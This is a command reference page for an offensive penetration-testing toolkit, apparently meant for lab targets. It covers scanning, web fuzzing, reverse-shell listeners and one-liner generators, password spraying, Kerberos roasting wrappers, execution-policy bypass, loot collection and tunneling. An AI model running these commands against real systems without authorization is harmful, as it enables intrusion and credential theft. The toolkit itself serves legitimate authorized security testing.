CalvinBackup/PentestPilot
1
0
Fork 0
mirror of https://github.com/0xMarcio/PentestPilot.git synced 2026-02-12 13:02:48 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
main
PentestPilot/TOOLKIT.md
0xMarcio 1ec50d14a3 docs: remove em dashes; convert pseudo-links to real Markdown links; improve formatting 
- Replace all em dashes with simple hyphens across repo\n- README: real links in Docs Index, badges and headings\n- HOWTO: clickable TOC, clean headings, hyphen usage\n- TOOLKIT: clickable TOC, cleaned bullets, crosslinks and examples\n- Dashboard and pack_report strings updated to avoid em dashes\n- .zshrc comment cleaned
2025-10-08 16:11:24 +02:00

357 lines
11 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# PentestPilot - Quick Reference
For stepbystep usage, pipeline semantics, dashboard features, and resume behavior, read HOWTO.md:1. This file focuses on a clickable, categorized command index with succinct usage. Most entries accept TARGET via env if a positional argument is omitted.
## Table of Contents
- [Setup](#setup)
- [Core Workflow](#core-workflow)
- [Enumeration](#enumeration-requires-target)
- [Automation](#automation-binautomation--see-howto-automation--orchestration-dashboard-manifest)
- [Web helpers](#web-helpers-binweb--see-howto-web-recon--routing)
- [Reverse shells](#reverse-shells-binshells)
- [File transfer](#file-transfer-bintransfer)
- [Crypto / Text](#crypto--text-bincrypto)
- [Privilege Escalation](#privilege-escalation-binprivesc)
- [Misc](#misc-binmisc)
- [AI](#ai-binai--see-howto-ai-integrations)
- [Active Directory](#active-directory-binad)
- [Passwords](#passwords-binpasswords)
- [Windows](#windows-binwindows)
- [Post-Exploitation](#post-exploitation-binpost)
- [DNS](#dns-bindns)
- [Scanning](#scanning-binscan)
- [Tunnels](#tunnels-bintunnel)
- [Pwn](#pwn-binpwn)
- [Hashes](#hashes-binhashes)
- [Tips](#tips)
## Setup
- Keep this repo in a working folder, e.g., htb/.
- Source the shell helpers from your main zshrc:
echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc
- Open a new shell or run: source .zshrc.htb
## Core Workflow
- settarget <ip_or_host>
- Creates targets/<target> with scans, loot, www, exploits.
- Sets OUTDIR to the targets scans directory.
- ar → auto_recon: quick scan, optional UDP, basic web enum
- webrecon → run web_recon on detected web ports
- wideweb → wide_web_recon on a list
- notesinit → scaffold notes.md in target directory
- notesattach → append scan artifacts summary to notes
## Enumeration (requires TARGET)
- nq → Quick nmap: scripts + versions
- nf → Full TCP: -p- then service/version
- nu → UDP top 200
- smb → SMB enumeration (anon by default)
- snmp → SNMP enumeration (community defaults to public)
Individual scripts (bin/)
- nmap_quick.sh <target>
- nmap_full.sh <target> [--rate 5000]
- nmap_udp.sh <target> [--top 200]
- smb_enum.sh <ip> [user] [pass]
- ldap_enum.sh <ip> [user] [pass] - auto-detect baseDNs
- nfs_enum.sh <ip>
- ftp_enum.sh <ip>
- snmp_enum.sh <ip> [community]
## Automation (bin/automation/) (see HOWTO: [Automation & Orchestration](HOWTO.md#automation--orchestration), [Dashboard](HOWTO.md#dashboard-status--evidence), [Manifest](HOWTO.md#manifest-state--resume))
- auto_recon.sh <target> [--no-udp]
- parse_nmap_open_ports.sh <*.gnmap>
- report_summary.py <*.gnmap ...>
- web_recon.sh <target|--url <url>>
- loot_pack.sh [dir]
- wide_web_recon.sh <hosts.txt>
- notes_init.sh <target>
- notes_attach.sh <target>
- full_pipeline.sh <domain|hosts.txt> [--resume|--force]
- manifest.py (init|set|get|addlist|show|task|taskstatus|taskreset) <target> [...]
- dashboard.py [--json]
- resume_all.py - resume full pipeline across all targets
- tech_actions.py <target> [--run] - suggest/run next steps based on httpx techs
- cleanup_scans.sh [dir] [days] [--force] - prune old scan files
- proxy_toggle.sh on|off [http://host:port]
- tmux_init.sh [session] - starter tmux layout
See also in HOWTO.md:
- Automation & Orchestration
- Dashboard (Status & Evidence)
- Manifest (State & Resume)
Examples
```
# Oneclick pipeline (resumeaware)
full_pipeline.sh target.htb
# Agentdriven full pipeline with auto tech actions
agent full target.htb
# Dashboard
dashboard --compact
# Resume all incomplete targets
resumeall
```
## Web helpers (bin/web/) (see HOWTO: [Web Recon & Routing](HOWTO.md#web-recon--routing))
- dirbuster.sh <url> [wordlist] [exts] - ffuf directory fuzz
- vhost_ffuf.sh <base-url> <domain> [wordlist] - virtual hosts
- param_fuzz.sh <url-with-FUZZ> [wordlist] - parameter discovery
- lfi_tester.py <url-with-PLACEHOLDER> - basic LFI checks
- tech_detect.sh <url> - headers + tech hints
- http_headers.sh <url> - raw headers
- url_titles.py <url1> [url2 ...] - titles and codes
- crawl_words.py <url> [depth] - extract words for wordlists
- sqli_quick.sh <url> <param> - sqlmap wrapper
- backup_hunter.sh <base-url> [paths.txt] - find common backups/configs
- git_dumper.sh <base-url> [outdir] - mirror exposed .git and restore
- cors_tester.py <url> [origin] - test ACAO/ACAC
- methods.sh <url> - show allowed methods (OPTIONS)
- clone_site.sh <url> [outdir] - wget mirror
- tls_scan.sh <host:443> - openssl-based TLS info
- robots_grabber.sh <base-url> - show Disallow entries
- webdav_detect.sh <url> - OPTIONS + PROPFIND
- httpx_probe.sh <host|file>
- nuclei_quick.sh <url|file> [tags]
- gobuster_dir.sh <url> [wordlist] [exts] [threads]
- httpx_to_nuclei.sh <host|file> [--severity auto|crit|high|med|low] [--tags tags]
- httpx_tech_route.py <host|file> [--tech list] [--dry-run]
- httpx_presets.sh <profile> <host|file>
- gobuster_vhost.sh <url> [wordlist] [threads]
- wpscan_quick.sh <wordpress-url>
- jenkins_quick.sh <jenkins-url>
- sonarqube_quick.sh <sonarqube-url>
- magento_quick.sh <magento-url>
- droopescan_quick.sh <url>
- joomscan_quick.sh <joomla-url>
See also in HOWTO.md:
- Web Recon & Routing
Examples
```
# Alive → nuclei with auto severity
httpx_to_nuclei.sh hosts.txt
# Route by technology and run extras
httpx_tech_route.py urls.txt --tech wordpress,drupal --wpscan --extra
# Vhost brute and directory brute
gobuster_vhost.sh http://$TARGET/ /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50
```
## Reverse shells (bin/shells/)
- revsh.py <lhost> <lport> - prints common one-liners
- listener.sh <port> - rlwrap + nc/ncat listener
- tty_upgrade.sh - quick TTY tips
Examples
```
# Listener
listener.sh 4444
# Oneliners to paste on target
revsh.py YOUR_IP 4444
# Upgrade TTY
tty_upgrade.sh
```
## File transfer (bin/transfer/)
- http_serve.sh [port] - simple Python HTTP server
- serve.py [port] - HTTP server with web upload (POST /upload)
- push_http.sh <file> <http://host:port/upload> - upload to serve.py
- dl_oneshots.sh <lhost> <port> <filename> - download one-liners
- smb_server.sh [share] [path] - impacket SMB server
Examples
```
# Simple HTTP
http_serve.sh 8000
# Upload server and push
serve.py 8000
push_http.sh loot.txt http://YOUR_IP:8000/upload
# SMB quick share
smb_server.sh share ./loot
```
## Crypto / Text (bin/crypto/)
- encoders.py b64e|b64d|urle|urld|hex|unhex|xor|rot
- jwt_show.py <jwt> - decode header/payload (no verify)
Examples
```
encoders.py b64e 'secret'; encoders.py urle 'a b'
jwt_show.py eyJhbGciOi...
```
## Privilege Escalation (bin/privesc/)
- linux_quick_enum.sh - basic local recon
- suid_scan.sh - list SUID/SGID
- caps_scan.sh - list file capabilities
Examples
```
linux_quick_enum.sh
caps_scan.sh
```
## Misc (bin/misc/)
- cyclic.py create <len> | offset <needle> - pattern + offset
- port_forward.sh - wrappers for ssh -L/-R/-D
- extract_urls.py <file...>
Examples
```
cyclic.py create 4000 | cyclic.py offset Aa0A
port_forward.sh -L 8080:127.0.0.1:80 user@host
extract_urls.py notes.md
```
## AI (bin/ai/) (see HOWTO: [AI Integrations](HOWTO.md#ai-integrations))
- ask.py [-m model] [-s system] "prompt" | - (stdin)
- wordlist_from_context.py <target> [context-file|-]
- orchestrate_web.py <hosts.txt>
- review_findings.py <notes.md> [extra]
- commands_planner.py "goal" [context]
- agent_orchestrator.py <task> - multi-agent runner (web|notes|post|ad)
See also in HOWTO.md:
- AI Integrations
Examples
```
# Plan commands from a goal + context
commands_planner.py "Probe admin portals" urls.txt
# Orchestrate web for a host list
orchestrate_web.py hosts.txt
# Multiagent runner
agent web hosts.txt
```
## Active Directory (bin/ad/)
- getnpusers_wrapper.sh <domain/user:pass> <dc_ip> [userlist.txt]
- getspns_wrapper.sh <domain/user:pass> <dc_ip>
- ldap_quick_users.sh <ip> <baseDN> [user pass]
- rpc_quick.sh <host> [user pass] - rpcclient lsa/users/groups
- kerbrute_wrapper.sh <domain> <users.txt> [dc-ip]
- cme_quick.sh <host> [user pass]
Examples
```
getnpusers_wrapper.sh domain/user:pass 10.10.10.5 users.txt
getspns_wrapper.sh domain/user:pass 10.10.10.5
rpc_quick.sh $TARGET
kerbrute_wrapper.sh domain users.txt 10.10.10.5
cme_quick.sh $TARGET user pass
```
## Passwords (bin/passwords/)
- mutate_words.py word1 [word2 ...] | -
- spray_http_basic.sh <url> <users.txt> <password>
- merge_dedupe.sh <file1> [file2 ...] - dedup merged lists
- wordlist_cleanup.sh <wordlist> [min] [max]
- hash_id.sh <hash> - simple guess when hashid missing
Examples
```
mutate_words.py "acme" "winter"
merge_dedupe.sh list1.txt list2.txt > merged.txt
wordlist_cleanup.sh merged.txt 8 64 > cleaned.txt
spray_http_basic.sh http://$TARGET/protected users.txt Winter2025!
```
## Windows (bin/windows/)
- privesc_quick.ps1 - run on target
- win_share_enum.ps1 -Target <host>
- find_unquoted_services.ps1 - potential service path issues
- find_path_writable.ps1 - writable PATH dirs
- windows_loot.ps1 - targeted loot collector
Examples
```
powershell -ep bypass -f bin/windows/privesc_quick.ps1
powershell -ep bypass -f bin/windows/win_share_enum.ps1 -Target $TARGET
powershell -ep bypass -f bin/windows/find_unquoted_services.ps1
```
## Post-Exploitation (bin/post/)
- linux_loot.sh - targeted loot collector with size caps
- windows_loot.ps1 - targeted loot collector (PowerShell)
- pack_report.sh <target> - merge loot/scans into markdown report
Examples
```
LOOT_DIR=/tmp/loot MAX_SIZE=10485760 INCLUDE_DB=1 bin/post/linux_loot.sh
bin/post/pack_report.sh $TARGET
```
## DNS (bin/dns/)
- zone_transfer.sh <domain> [ns]
- subenum.sh <domain>
- gobuster_dns.sh <domain> [wordlist] [threads]
Examples
```
zone_transfer.sh target.htb
gobuster_dns.sh target.htb /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 100
```
## Scanning (bin/scan/)
- naabu_quick.sh <target> [flags]
- masscan_top.sh <target> [rate]
Examples
```
naabu_quick.sh $TARGET -p 1-65535
masscan_top.sh $TARGET 20000
```
## Tunnels (bin/tunnel/)
- chisel_server.sh <port>
- chisel_client.sh <host:port> R:<lport>:<rhost>:<rport>
- autossh_socks.sh <user@host> [lport]
- socat_forward.sh -L|-R <lport> <rhost> <rport>
Examples
```
autossh_socks.sh user@pivot 1080
chisel_server.sh 8000 &
chisel_client.sh YOUR_IP:8000 R:8080:127.0.0.1:80
```
## Pwn (bin/pwn/)
- pwntools_template.py - starter exploit template
Examples
```
python3 bin/pwn/pwntools_template.py REMOTE=1 HOST=$TARGET PORT=31337
```
## Hashes (bin/hashes/)
- extract_ntlm_from_secretsdump.py <file> [out]
- john_pfx.sh <file.pfx> - john format for PFX
Examples
```
extract_ntlm_from_secretsdump.py secretsdump.out ntlm.txt
john_pfx.sh cert.pfx > pfx.hash
```
## Tips
- OUTDIR controls where scans are saved; set by settarget.
- Most scripts accept TARGET via env if argument omitted.
- If a tool isnt installed (ffuf, getcap, ldapsearch, snmpwalk), install it or adjust the command.
- For AI helpers, set OPENAI_API_KEY or run a local Ollama server.
- Use responsibly and only with explicit authorization.
- Dashboard flags: --no-color, --compact, --json
- Read HOWTO.md for detailed guidance and examples.
Reference in New Issue View Git Blame Copy Permalink